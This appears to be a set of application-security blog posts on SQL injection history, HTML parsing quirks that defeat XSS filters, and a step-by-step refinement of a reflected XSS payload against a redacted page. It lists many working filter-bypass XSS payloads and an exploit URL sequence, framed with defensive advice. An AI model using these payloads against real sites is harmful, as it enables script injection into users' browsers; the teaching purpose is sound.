The article rate here slowed down in February due to my preparation for B-Sides SF and RSA 2013. I even had to give a brief presentation about Hacking Web Apps at my company’s booth. (Followed by a successful book signing. Thank you!)
In that presentation I riffed off several topics repeated throughout this site. One topic was the mass hysteria we are forced to suffer from web sites that refuse to write safe SQL statements.
Those of you who are developers may already be familiar with a SQL-related API, though some may not be aware that the acronym stands for Advanced Persistent Ignorance.
Here’s a slide I used in the presentation (slide 13 of 29). Since I didn’t have enough time to complete nine years of research I left blanks for the audience to fill in.
Now you can fill in the last line. Security company Bit9 admitted last week to a compromise that was led by a SQL injection exploit. Sigh. The good news was that no massive database of usernames and passwords (hashed or not) went walkabout. The bad news was that attackers were able to digitally sign malware with stolen Bit9 code-signing certificates.
I don’t know what I’ll add as a fill-in-the-blank for 2014. Maybe an entry for NoSQL. After all, developers love to reuse an API. String concatenation in JavaScript is no better than doing the same for SQL.
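To make that comparison concrete, here is a minimal sketch of why concatenation is the problem regardless of the query language. The function names and the users table are hypothetical, and the { text, values } shape only illustrates keeping data apart from the statement; it is not the API of any particular database driver.

```javascript
// Hypothetical helper: builds a statement by gluing user input into the SQL text.
function unsafeQuery(name) {
  return "SELECT id FROM users WHERE name = '" + name + "'";
}

// Hypothetical helper: keeps the statement fixed and passes data separately,
// in the spirit of a prepared statement. The { text, values } shape is an
// assumption made for this sketch.
function preparedQuery(name) {
  return { text: "SELECT id FROM users WHERE name = ?", values: [name] };
}

const input = "x' OR '1'='1";

// With concatenation, the input rewrites the statement's grammar.
const unsafe = unsafeQuery(input);

// With placeholders, the statement text never changes; the input stays data.
const prepared = preparedQuery(input);

console.log(unsafe);
console.log(prepared.text, prepared.values);
```

The first statement now carries an extra OR clause that the developer never wrote. The second still has exactly one placeholder, whatever the input contains.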
If we can’t learn from PHP’s history in this millennium, perhaps we can look further back for more fundamental lessons. The Greek historian Polybius noted how Romans protected passwords (watchwords) in his work, Histories [1]:
To secure the passing round of the watchword for the night the following course is followed. One man is selected from the tenth maniple, which, in the case both of cavalry and infantry, is quartered at the ends of the road between the tents; this man is relieved from guard-duty and appears each day about sunset at the tent of the Tribune on duty, takes the tessera or wooden tablet on which the watchword is inscribed, and returns to his own maniple and delivers the wooden tablet and watchword in the presence of witnesses to the chief officer of the maniple next his own; he in the same way to the officer of the next, and so on, until it arrives at the first maniple stationed next the Tribunes. These men are obliged to deliver the tablet (tessera) to the Tribunes before dark.
More importantly, the Romans included a consequence for violating the security of this process:
If they are all handed in, the Tribune knows that the watchword has been delivered to all, and has passed through all the ranks back to his hands: but if any one is missing, he at once investigates the matter; for he knows by the marks on the tablets from which division of the army the tablet has not appeared; and the man who is discovered to be responsible for its non-appearance is visited with condign punishment.
We truly need a fitting penalty for SQL injection vulnerabilities; perhaps only tempered by the judicious use of salted, hashed passwords.
-
[1] Polybius, Histories, trans. Evelyn S. Shuckburgh (London, New York: Macmillan, 1889), Perseus Digital Library. https://data.perseus.org/citations/urn:cts:greekLit:tlg0543.tlg001.perseus-eng1:6.34 (accessed March 5, 2013).
• • •
When designing security filters against HTML injection you need to outsmart the attacker, not the browser. HTML’s syntax is more forgiving of mis-nested tags, unterminated elements, and entity-encoding compared to formats like XML. This is a good thing, because it ensures a User-Agent renders a best-effort layout for a web page rather than bailing on errors or typos that would leave visitors staring at blank pages or incomprehensible error messages.
It’s also a bad thing, because User-Agents have to make educated guesses about a page author’s intent when they encounter unexpected markup. This is the kind of situation that leads to browser quirks and inconsistent behavior.
One of HTML5’s improvements is a codified algorithm for parsing content. In the past, browsers not only had quirks, but developers would write content specifically to take advantage of those idiosyncrasies – giving us a world where sites worked with one and only one version of Internet Explorer. A great deal of blame lies at the feet of developers who refused to consider interoperable HTML design and instead chose the principle of Code Relying on Awful Patterns.
Parsing Disharmony
Untidy markup is a security hazard. It makes HTML injection vulns more difficult to detect and block, especially for regex-based countermeasures.
Regular expressions have irregular success as security mechanisms for HTML. While regexes excel at pattern-matching they fare miserably in semantic parsing. Once you start building a state mechanism for element start characters, token delimiters, attribute names, and so on, anything other than a narrowly-focused regex becomes unwieldy at best.
First, let’s take a look at some simple elements with uncommon syntax. Regular readers will recognize a favorite XSS payload of mine, the img tag:
<img/alt=""src="."onerror=alert(9)>
Spaces aren’t required to delimit attribute name/value pairs when the value is marked by quotes. Also, the element name may be separated from its attributes with whitespace or the forward slash. We’re entering forgotten parsing territory. For some sites, this will be a trip to the undiscovered country.
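As a rough illustration of how this syntax slips past pattern-matching, consider the sketch below. The naiveFilter pattern is a hypothetical denylist written for this example, not one taken from a real product; it assumes, as many hand-written filters do, that whitespace separates the element name from its attributes.

```javascript
// Hypothetical denylist pattern: an img tag, whitespace, then an onerror attribute.
const naiveFilter = /<img\s+[^>]*\sonerror\s*=/i;

// The payload as most filter authors imagine it.
const textbook = '<img src="." onerror=alert(9)>';
// The payload from above, with a slash and quotes doing the delimiting.
const unusual = '<img/alt=""src="."onerror=alert(9)>';

function isBlocked(markup) {
  return naiveFilter.test(markup);
}

console.log(isBlocked(textbook)); // true
console.log(isBlocked(unusual));  // false
```

Loosening the pattern to accept a slash would catch this one payload, but each such patch is a step toward re-implementing an HTML parser inside a regex.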
Delimiters are fun to play with. Here’s a case where empty quotes separate the element name from an attribute. Note the difference in value delineation. The id attribute has an unquoted value, so we separate it from the subsequent attribute with a space. The href has an empty value delimited with quotes. The parser doesn’t need whitespace after a quoted value, so we put onclick immediately after.
<a""id=a href=""onclick=alert(9)>foo</a>
Browsers try their best to make sites work. As a consequence, they’ll interpret markup in surprising ways. Here’s an example that mixes start and end tag tokens in order to deliver an XSS payload:
<script/<a>alert(9)</script>
We can adjust the end tag if there’s a filter watching for </script>. In the following payload, note the space between the last </script and </a>.
<script/<a>alert(9)</script </a>
Successful HTML injection thrives on bad mark-up to bypass filters and take advantage of browser quirks. Here’s another case where the browser accepts an incorrectly terminated tag. If the site turns the following payload’s %0d%0a into \r\n (carriage return, line feed) when it places the payload into HTML, then the browser might execute the alert function.
<script%0d%0aalert(9)</script>
Or you might be able to separate the lack of closing > character from the alert function with an intermediate HTML comment:
<script%20<!--%20-->alert(9)</script>
The way browsers deal with whitespace is a notorious source of security problems. The Samy worm exploited IE’s tolerance for splitting a javascript: scheme with a line feed.
<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="alert(9)"></div>
Or we can throw an entity into the attribute list. The following is bad markup. But if it’s bad markup that bypasses a filter, then it’s a good injection.
<a href=""&/onclick=alert(9)>foo</a>
HTML entities have a special place within parsing and injection attacks. They’re most often used to bypass string-matching. For example, the following three schemes use an entity for the “s” character:
java&#115;cript:alert(9)
java&#x73;cript:alert(9)
java&#x0073;cript:alert(9)
The danger with entities and parsing is that you must keep track of the context in which you decode them. But you also need to keep track of the order in which you resolve entities (or otherwise normalize data) and when you apply security checks. In the previous example, if you had checked for “javascript” in the scheme before resolving the entity, then your filter would have failed. Think of it as a time of check to time of use (TOCTOU) problem that’s affected by data transformation rather than the more commonly thought-of race condition.
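The ordering problem can be sketched in a few lines. Both helpers below are hypothetical and deliberately small: decodeNumericEntities handles only numeric character references, and hasJavascriptScheme stands in for whatever scheme check a filter might apply. Real HTML decoding has many more cases.

```javascript
// Hypothetical, deliberately small decoder: handles only numeric character
// references such as &#115; and &#x73;. Named entities are out of scope here.
function decodeNumericEntities(text) {
  return text.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, code) => {
    const isHex = code[0] === 'x' || code[0] === 'X';
    const value = isHex ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return String.fromCodePoint(value);
  });
}

// Hypothetical security check: does the value start with a javascript: scheme?
function hasJavascriptScheme(text) {
  return /^\s*javascript:/i.test(text);
}

const href = 'java&#115;cript:alert(9)';

// Check first, decode later: the filter sees no scheme to reject.
const checkedBeforeDecoding = hasJavascriptScheme(href);

// Decode first, then check: the filter sees what the browser will see.
const checkedAfterDecoding = hasJavascriptScheme(decodeNumericEntities(href));

console.log(checkedBeforeDecoding); // false
console.log(checkedAfterDecoding);  // true
```

The check itself is identical in both cases. Only its position relative to the transformation changes, which is what makes this a time-of-check problem rather than a pattern problem.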
Security
User Agents are often forced to second-guess the intended layout of error-ridden pages. HTML5 brings more sanity to parsing markup. But we still don’t have a mechanism to help browsers distinguish between typos, intended behavior, and HTML injection attacks. There’s no equivalent to prepared statements for SQL.
- Fix the vuln, not the exploit – It’s not uncommon for developers to denylist a string like alert or javascript under the assumption that doing so prevents attacks. That sort of thinking mistakes the payload for the underlying problem. The problem is placing user-supplied data into HTML without taking steps to ensure the browser renders the data as text rather than markup.
- Test with multiple browsers – A payload that takes advantage of a rendering quirk for browser A isn’t going to exhibit security problems if you’re testing with browser B.
- Prefer parsing to regex patterns – Regexes may be as effective as they are complex, but you pay a price for complexity. Trying to read someone else’s regex, or even maintaining your own, becomes more error-prone as the pattern becomes longer.
- Encode characters at their point of presentation – You’ll be more successful at blocking HTML injection attacks if you consistently apply encoding rules for characters like < and > and prevent quotes from breaking attribute values.
- Define clear expectations – Ambiguity for browsers enables them to recover from errors gracefully. Ambiguity for security weakens the system.
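As a minimal sketch of encoding at the point of presentation, the helper below rewrites the characters that let data escape from element content or from a quoted attribute value. The name encodeForHtml is hypothetical. It assumes the output lands in one of those two contexts only; data written into a script block or a URL needs different rules.

```javascript
// Hypothetical helper: encodes the characters that let data break out of
// element content or a quoted attribute value. Not suitable for script
// blocks, URLs, or unquoted attributes.
function encodeForHtml(value) {
  const replacements = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(value).replace(/[&<>"']/g, (ch) => replacements[ch]);
}

const payload = '<img/alt=""src="."onerror=alert(9)>';

// Encode at the moment the data is written into markup.
const rendered = '<p>' + encodeForHtml(payload) + '</p>';

console.log(rendered);
```

The helper never has to recognize the payload as an attack. It treats every value the same way, so the browser renders the data as text however strangely it is delimited.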
HTML injection attacks try to bypass filters in order to deliver a payload that a browser will render. Security filters should be strict, but not so myopic that they miss “improper” HTML constructs that a browser will happily render.
• • •
HTML injection vulns make a great Voight-Kampff test for showing you care about security. They’re a way to identify those who resort to the excuse, “But it’s not exploitable.”
The first versions of PCI DSS explicitly referenced cross-site scripting (XSS) to encourage sites to take it seriously. Since failure to comply with that standard can lead to fines or loss of credit card processing, it sometimes drove perverse incentives. Every once in a while a site’s owners might refuse to acknowledge a vuln is valid because they don’t see an alert pop up from a test payload. In other words, they claim that the vuln’s risk is negligible since it doesn’t appear to be exploitable.
(They also misunderstand that having a vuln doesn’t automatically mean they’ll face immediate consequences. The standard is about practices and processes for addressing vulns as much as it is for preventing them in the first place.)
In any case, the focus on alert payloads is misguided. If the site reflects arbitrary characters from the user, that’s a bug that should be fixed. And we can almost always refine a payload to make it work. Even for the dead-simple alert.
(1) Probe for Reflected Values
In the simplest form of this example, a URL parameter’s value is written into a JavaScript string variable called pageUrl. An easy initial probe is inserting a single quote (%27 in the URL examples):
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27
The code now has an extra quote hanging out at the end of the pageUrl variable:
function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'';
    if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
        var hflanguage = document.getElementById(getClientId().HfLanguage);
        hflanguage.value = '1';
    }
    $.cookie('LanCookie', lcname, {path: '/'});
    __doPostBack('__Page_btnLanguageLink','')
}
But when the devs go to check the vuln, they claim that it’s not possible to issue an alert(). For example, they update the payload with something like this:
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;alert(9)//
The payload is reflected in the HTML, but no pop up appears. Nor do any variations seem to work. Nothing results in JavaScript execution. There’s a reflection point, but no execution.
(2) Break Out of One Context, Break Into Another
We can be more creative about our payload. HTML injection attacks are a coding exercise like any other – they just tend to be a bit more fun. So, it’s time to debug.
Our payload is reflected inside a JavaScript function scope. Maybe the SetLanCookie() function just isn’t being called within the page. That would explain why the alert() never runs.
A reasonable step is to close the function with a curly brace and dangle a naked alert() within the script block.
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;var%20a=%27
The following code confirms that the site still reflects the payload (see line 4). However, our browser still doesn’t launch the desired pop-up.
function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'}alert(9);var a='';
    if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
        var hflanguage = document.getElementById(getClientId().HfLanguage);
        hflanguage.value = '1';
    }
    $.cookie('LanCookie', lcname, {path: '/'});
    __doPostBack('__Page_btnLanguageLink','')
}
But browsers have Developer Consoles that print friendly messages about their activity! Taking a peek at the console output reveals why we have yet to succeed in firing an alert(). The script block still contains syntax errors. Unhappy syntax makes an unhappy browser and an unhappy hacker.
[14:36:45.923] SyntaxError: function statement requires a name @ https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert(9);function(){var%20a=%27 SomePage.aspx:345
[14:42:09.681] SyntaxError: syntax error @ https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;}()alert(9);function(){var%20a=%27 SomePage.aspx:345
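One way to get the same kind of feedback away from the browser is to rebuild the reflected script and ask a JavaScript engine whether it parses. The sketch below is an approximation: reflect() is a hypothetical, abbreviated stand-in for the server's template, and parses() relies on the Function constructor, so it assumes an environment such as Node.js that permits it. The constructor compiles the source without running it.

```javascript
// Hypothetical, abbreviated stand-in for the server: reflects the value into
// the script block on the same line as the pageUrl assignment.
function reflect(value) {
  return [
    "function SetLanCookie() {",
    "  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=" + value + "';",
    "  if (pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()) {",
    "    hflanguage.value = '1';",
    "  }",
    "  __doPostBack('__Page_btnLanguageLink', '')",
    "}",
  ].join("\n");
}

// Compile the script without running it. The Function constructor throws a
// SyntaxError when the source is not valid JavaScript.
function parses(source) {
  try {
    new Function(source);
    return true;
  } catch (err) {
    if (err instanceof SyntaxError) return false;
    throw err;
  }
}

console.log(parses(reflect("a")));                              // true
console.log(parses(reflect("a';alert(9)//")));                  // true
console.log(parses(reflect("a'}alert(9);var a='")));            // false
console.log(parses(reflect("a'}alert(9);function(){var a='"))); // false
```

The second payload parses cleanly, so its failure to pop an alert has a different cause: the alert sits inside a function that nothing calls. The last two fail at parse time, which matches the complaints in the console.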
(3) Capture the Function Body
When we terminate the JavaScript string, we must also remember to maintain clean syntax for what follows the payload. In trivial cases, you can get away with an inline comment like //.
Another trick is to re-capture the remainder of a quoted string with a new variable declaration. In the previous example, this is why there’s a ;var a =' inside the payload.
In this case, we need to re-capture the dangling function body. This is why you should know the JavaScript language rather than just memorize payloads. It’s not hard to make this attack work – just update the payload with an opening function statement, as below:
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;function%28%29{var%20a=%27
The page reflects the payload and now we have nice, syntactically happy JavaScript code (whitespace added for legibility).
function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'
}
alert(9);
function(){
    var a='';
    if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
        var hflanguage = document.getElementById(getClientId().HfLanguage);
        hflanguage.value = '1';
    }
    $.cookie('LanCookie', lcname, {path: '/'});
    __doPostBack('__Page_btnLanguageLink','')
}
So, we’re almost there. But the pop-up remains elusive. The function still isn’t firing.
(4) Var Your Function
Ah! We created a function, but forgot to name it. JavaScript is happy with anonymous functions, but only where it expects an expression; a function statement like ours needs a name. For example, the following syntax creates and executes an anonymous function that generates an alert:
(function(){alert(9)})()
We don’t need to be that fancy, but it’s nice to remember our options. We’ll assign the function to another var.
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;var%20a=function%28%29{var%20a=%27
Finally, we reach a point where the payload inserts an alert() and modifies the surrounding JavaScript context so the browser has nothing to complain about. In fact, the payload is convoluted enough that it doesn’t trigger the browser’s XSS Auditor. (Which you shouldn’t be relying on, anyway. I mention it as a point of trivia.)
Behold the fully exploited page, with spaces added for clarity:
function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'
}
alert(9);
var a = function(){
    var a ='';
    if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
        var hflanguage = document.getElementById(getClientId().HfLanguage);
        hflanguage.value = '1';
    }
    $.cookie('LanCookie', lcname, {path: '/'});
    __doPostBack('__Page_btnLanguageLink','')
}
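For anyone who wants to confirm the difference between the first attempt and the final payload without the redacted site, here is a rough sketch. It assumes Node.js or another environment that permits the Function constructor. reflect() is a hypothetical, abbreviated version of the page's script block, and alertsFired() runs that block with a stubbed alert, much as the browser would when loading the page. Nothing calls SetLanCookie().

```javascript
// Hypothetical, abbreviated stand-in for the server: reflects the value into
// the script block on the same line as the pageUrl assignment.
function reflect(value) {
  return [
    "function SetLanCookie() {",
    "  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=" + value + "';",
    "  if (pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()) {",
    "    hflanguage.value = '1';",
    "  }",
    "  __doPostBack('__Page_btnLanguageLink', '')",
    "}",
  ].join("\n");
}

// Run the reflected script block with a stubbed alert and report the
// arguments it received. Only top-level statements execute.
function alertsFired(source) {
  const calls = [];
  const alertStub = (arg) => { calls.push(arg); };
  new Function("alert", source)(alertStub);
  return calls;
}

// First attempt: the alert lands inside SetLanCookie(), which is never called.
const firstAttempt = alertsFired(reflect("a';alert(9)//"));

// Final payload: the function is closed early, so the alert runs at the top
// level, and the leftover body is captured by a new function expression.
const finalPayload = alertsFired(reflect("a'}alert(9);var a=function(){var a='"));

console.log(firstAttempt); // []
console.log(finalPayload); // [ 9 ]
```

Both payloads are reflected and both parse. Only the second places the alert where the browser will execute it, which is why a missing pop-up says little about whether the reflection is exploitable.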
I dream of a world without HTML injection. I also dream of Electric Sheep.
I’ve seen XSS and SQL injection you wouldn’t believe. Articles on fire off the pages of this blog. I watched scanners glitter in the dark near an appsec program. All those moments will be lost in time…like tears in rain.
• • •